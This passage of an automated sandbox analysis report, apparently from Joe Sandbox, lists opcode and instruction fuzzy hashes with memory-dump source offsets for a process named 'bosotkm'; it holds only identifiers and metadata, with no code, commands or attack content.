                            • Opcode ID: 6634e8cec6aa25cc953cd94d64798f3c677cf340f7c0daf5e8e62e1df16af99f
                            • Instruction ID: e3cca17ae2d5b0927a7d640105fcc3df4b923444547e03dd3c622ceabe3c1107
                            • Opcode Fuzzy Hash: 6634e8cec6aa25cc953cd94d64798f3c677cf340f7c0daf5e8e62e1df16af99f
                            • Instruction Fuzzy Hash: 2021A4313082654FDB259F36D858B7A3BEABF45615B089079F887CB395CA74CC00DB60
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2512484168.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_135d000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d320595ec17e501c631e2f846c1d4027ca2becdd536717efe17cc2ac07009a4
                            • Instruction ID: ed77527556a6faae4a945d1d5a2227fb5d3ef5303b5bb63a86c0fec683f5ad49
                            • Opcode Fuzzy Hash: 3d320595ec17e501c631e2f846c1d4027ca2becdd536717efe17cc2ac07009a4
                            • Instruction Fuzzy Hash: 5B213372500204EFDB41DF94D8C0F26BF65FB88728F208569ED090B256C336D456CAB2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be931599e4518cf0d59937b8cde40ecb576d81921355f6ea35220990182bbc68
                            • Instruction ID: 37379abc20021b7c287bfc4657982cc08524f6b954e07a668ad341fd9cb3e9c5
                            • Opcode Fuzzy Hash: be931599e4518cf0d59937b8cde40ecb576d81921355f6ea35220990182bbc68
                            • Instruction Fuzzy Hash: 8F217835E00269DFEB18DBB8C845BEEBBF5AB04240F109066D999DB294E634CB40CB90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0780a141106a7b9c021ad584beb1d7a24a2865a90a2e9c1204822e5adfccd063
                            • Instruction ID: 2649acdb8de761df183f20046f409568e5cb639a817ce30320298c8d00b4c844
                            • Opcode Fuzzy Hash: 0780a141106a7b9c021ad584beb1d7a24a2865a90a2e9c1204822e5adfccd063
                            • Instruction Fuzzy Hash: 10213D353082589FDB15CF2AC854EAA7BEABF89214F054095FD85CB3A5DA35DC50DB20
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 563480bfd237513faeab373958ef04a2d07c622d4345d8578c3eca31e33cf095
                            • Instruction ID: 5b2e7cbb48ae1b1fdfbc28d592856a6aa66d5021f85453fb9e9b99c9e923e862
                            • Opcode Fuzzy Hash: 563480bfd237513faeab373958ef04a2d07c622d4345d8578c3eca31e33cf095
                            • Instruction Fuzzy Hash: BF215B353042589FDB15CF2AC844AAA7BFABF8A214F1550A5F945CB3A5DA35DC40CB20
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eabcbfca71d1d199c387f8368d98b27f763f78e5f4e9c71c666f50e6d7606bbc
                            • Instruction ID: 5b8fd9714a14cc81fd5da48742b41ec3c983ab8bf6d7cba3eccdd38c87a3b9d4
                            • Opcode Fuzzy Hash: eabcbfca71d1d199c387f8368d98b27f763f78e5f4e9c71c666f50e6d7606bbc
                            • Instruction Fuzzy Hash: 87011B369002299FCF05CF94C804CD9BB76FF48320B0684A5EA057F235C276E926DB90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 97b6659f410e6d8e54126baced6d21aa0e0dc4c106b5f5a60df75c856a18c14b
                            • Instruction ID: 7725c1ce90a29cd70508d7f6765bba17ef93afa2590940fd758a199bc672cf66
                            • Opcode Fuzzy Hash: 97b6659f410e6d8e54126baced6d21aa0e0dc4c106b5f5a60df75c856a18c14b
                            • Instruction Fuzzy Hash: A2210831A002298FDB04DF94D594ADDB7F2FB4C304F6051A4E545BB2A5DB71AD45CBA0
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc1fc51fe0b6a73f09d9ae582c52c003910ea53af51deea732aa29a43b8c5463
                            • Instruction ID: b5d369b4a67e30f2ff0f9a403b1e284e57b657e8448a01c9d2495b47d944d28b
                            • Opcode Fuzzy Hash: fc1fc51fe0b6a73f09d9ae582c52c003910ea53af51deea732aa29a43b8c5463
                            • Instruction Fuzzy Hash: E021AB74F0061ACFCB04EF64D4459AEB7B5FF89300F10456AD54597364DB709906CBA5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0138ae5c611b06da06bffc7aa3fd596e9e9311920f0bfc7600e198e7addbad00
                            • Instruction ID: 098ef4b1cc3d542f82b14c1c2a9cc87096915c92e350b802a56fc064238e57d4
                            • Opcode Fuzzy Hash: 0138ae5c611b06da06bffc7aa3fd596e9e9311920f0bfc7600e198e7addbad00
                            • Instruction Fuzzy Hash: B8212A71A002198FDB04DF64C959ADD77F2BF4C304F2055A8E441BB2A5DB359D45CFA0
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9cac0d8c7d8be7af0c59e8ebcdbca810907a5cc9739022b7e768ac60508306b9
                            • Instruction ID: ccbb260c57377b7028e596d7dc1fc19def072b81bd28dcff0c221fd408d0b4be
                            • Opcode Fuzzy Hash: 9cac0d8c7d8be7af0c59e8ebcdbca810907a5cc9739022b7e768ac60508306b9
                            • Instruction Fuzzy Hash: 8D116136A04255AFDB06CF94CC04CD9BF76FF49310B0684A5E645AF276C275E826EB90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 97146e1d0ee165a521b449eadeacd805b261a27b3d39e2305ab8bacd5bea9c34
                            • Instruction ID: b49e98c2e985f8986e5f673e7faf1581ddca23d924326f7d39007a15c37d04f4
                            • Opcode Fuzzy Hash: 97146e1d0ee165a521b449eadeacd805b261a27b3d39e2305ab8bacd5bea9c34
                            • Instruction Fuzzy Hash: 5A21BE34B106148FCB18EF29D888A6EBBF6FF89310F144529E64697364CB30ED05CBA1
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e03d652cb6a7843fab066c0fb0e47f8dcaee373da5ca8c1c149cd26bd1ee4e9
                            • Instruction ID: 638fee6edef2cc364d4399577bc9dd0b7bbe72a1fc365cf24121e63f454833d5
                            • Opcode Fuzzy Hash: 3e03d652cb6a7843fab066c0fb0e47f8dcaee373da5ca8c1c149cd26bd1ee4e9
                            • Instruction Fuzzy Hash: 59118236310014AFDF159F59E848C69BFB6FF8C32470540A6F6499B231CB31D822DB81
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2512484168.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_135d000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                            • Instruction ID: 7a94560130aa933be0060aea44ad7cb006d1923f4bc83669643e89101fcc01cb
                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                            • Instruction Fuzzy Hash: C811DF76504280DFCB02CF44D5C0B16BF71FB84324F2485A9DC090B257C33AD45ACBA2
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3413a15cbb835ac88efb4275768b08342df2c761d23e91e03ae3a663f9c19a57
                            • Instruction ID: 740a24be61d720aa1a3e0d8d6015691055368b8be542312e733e008ca2767885
                            • Opcode Fuzzy Hash: 3413a15cbb835ac88efb4275768b08342df2c761d23e91e03ae3a663f9c19a57
                            • Instruction Fuzzy Hash: 6711FAB6A0021CEFDB15DF99D840CDEBBBDFF8D210B018166F955E7250EA30A905CBA0
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d75fd281aba911b8d6aec808556e9e41448e5c656cfe4d4e514343e142995c56
                            • Instruction ID: 0a73a3adb6fd72ac36308be9d5da7b9e694eab52852bb0a2d736e5c303c05278
                            • Opcode Fuzzy Hash: d75fd281aba911b8d6aec808556e9e41448e5c656cfe4d4e514343e142995c56
                            • Instruction Fuzzy Hash: B601D2353007109FD7249B24D808B2B3BA3ABC9324F149628E6964B794CB75EC43CB80
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: de94c66382c9fe7a317639b544f40a554d12adc6ae2dcbe0ce58cb5b1d31d732
                            • Instruction ID: cfa5c531bad0a82883c21a54f79c90a8db593fbd7816de371339987408f06a54
                            • Opcode Fuzzy Hash: de94c66382c9fe7a317639b544f40a554d12adc6ae2dcbe0ce58cb5b1d31d732
                            • Instruction Fuzzy Hash: 7701B1353007149FD3249A34D848A7B77A7ABC9324F14962CE6964B794CB75EC43CBC0
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4d8fc25397292ec4126b2ccdd21a6fdf9c09171cfe312117515ec6cc39b68040
                            • Instruction ID: 26b05cb46f684638f924af188d2d72836614bdb1e67ef1227004962b9761db06
                            • Opcode Fuzzy Hash: 4d8fc25397292ec4126b2ccdd21a6fdf9c09171cfe312117515ec6cc39b68040
                            • Instruction Fuzzy Hash: 870171353006109FC3099F65D415A5ABBF6EBCD721B108668E54687390CF75EC02CBC8
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b53c2086499cbbdb3933aef1fc318778a76040be8712d2ad24208c45be2af9ef
                            • Instruction ID: cf6a2bd988065158aaff69b2603a976dc610c5d590151c53c3aef2eb1c841424
                            • Opcode Fuzzy Hash: b53c2086499cbbdb3933aef1fc318778a76040be8712d2ad24208c45be2af9ef
                            • Instruction Fuzzy Hash: 09F0E97130D3A04FEF220A2EAC94515BF65EF8A65878940FBFDC6DB246DD508C05C7A5
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 727cbca540544f95c535adbe7fbc689d7bc96ecb88e7001bac9a6dd200046561
                            • Instruction ID: a8bf89e6eccdd66121728c25ee323aace5f6532ca1ca7bd2b812ffbc237b222e
                            • Opcode Fuzzy Hash: 727cbca540544f95c535adbe7fbc689d7bc96ecb88e7001bac9a6dd200046561
                            • Instruction Fuzzy Hash: 3F0169393006109FC3099F29D41995ABBE6EBCC721B108669E94A8B394CF71EC42CBD9
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 640f68ae4313339f6cf9a3f8e0d6fb7189ebff9baaa6fb8d169eda77c50590c2
                            • Instruction ID: 130c5b2d0e1e8e714aa8687d685636401a39365e56b41a491023abf3b3a98201
                            • Opcode Fuzzy Hash: 640f68ae4313339f6cf9a3f8e0d6fb7189ebff9baaa6fb8d169eda77c50590c2
                            • Instruction Fuzzy Hash: 02F06D773502009FD304DB5AC895E2A77AAFF89721F148469F956CB360CA71EC02CB90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68ab7cc06e91cdd86e5874d5f15fd8df86f24615f86e179665a0a434abd45576
                            • Instruction ID: 4ff333b129ddf5ca857a0b0b5a27d357068fa6060391682f64c233c230add21e
                            • Opcode Fuzzy Hash: 68ab7cc06e91cdd86e5874d5f15fd8df86f24615f86e179665a0a434abd45576
                            • Instruction Fuzzy Hash: 37F0A9312003059BD711DF25EC91E87BBBAEFC5310B00892EB5568B251DA70B8088754
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ff5330cbd8c1871281a449913657d5171ef679978b4d41bc65c90a8d172574c2
                            • Instruction ID: f9793ba02d5a094e6b82f2895e2e4d31e35fc5136b3258e405ce7b253f2554e0
                            • Opcode Fuzzy Hash: ff5330cbd8c1871281a449913657d5171ef679978b4d41bc65c90a8d172574c2
                            • Instruction Fuzzy Hash: 01F02031B003208BE3242A349C09B6A33A6AB81221F005879D6868B284DE32DC028780
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7b14ba7b11061e88ec9fd9a46c8ff595211c0a6e015e8f9af6f78af818c3370
                            • Instruction ID: 471e3d3b20ac6c58cb4bb6998809083ab70a22c2dd9e21f26171793e51319c90
                            • Opcode Fuzzy Hash: e7b14ba7b11061e88ec9fd9a46c8ff595211c0a6e015e8f9af6f78af818c3370
                            • Instruction Fuzzy Hash: 04F0EC31B003108FD3241B30DD0DB657BF6FB45655F105469D5C24A254DF75DC02CB90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 28f81d4d522ca05a66e5a1c2bdfb27309d4831d05d236451445bebf4bea8aa8a
                            • Instruction ID: a1bbcc71b54e4c7d5bb81982b094a54df838741cb343741497f1c88333e9dbc8
                            • Opcode Fuzzy Hash: 28f81d4d522ca05a66e5a1c2bdfb27309d4831d05d236451445bebf4bea8aa8a
                            • Instruction Fuzzy Hash: EEF03A353506009FC314DF19D454D2A77AAFFCC721B104469F9468B761CA31EC02CB90
                            Memory Dump Source
                            • Source File: 0000000B.00000002.2541167780.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_5e20000_bosotkm.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c6e3f6724c10e3d3e535bd9b1ccd41705c267743c0f1660b90a83f617bcaaa09
                            • Instruction ID: 2104c062249b4107ca1a3776a1d5b54e3dbf28887bd053034bde0f7b1015ab5e
                            • Opcode Fuzzy Hash: c6e3f6724c10e3d3e535bd9b1ccd41705c267743c0f1660b90a83f617bcaaa09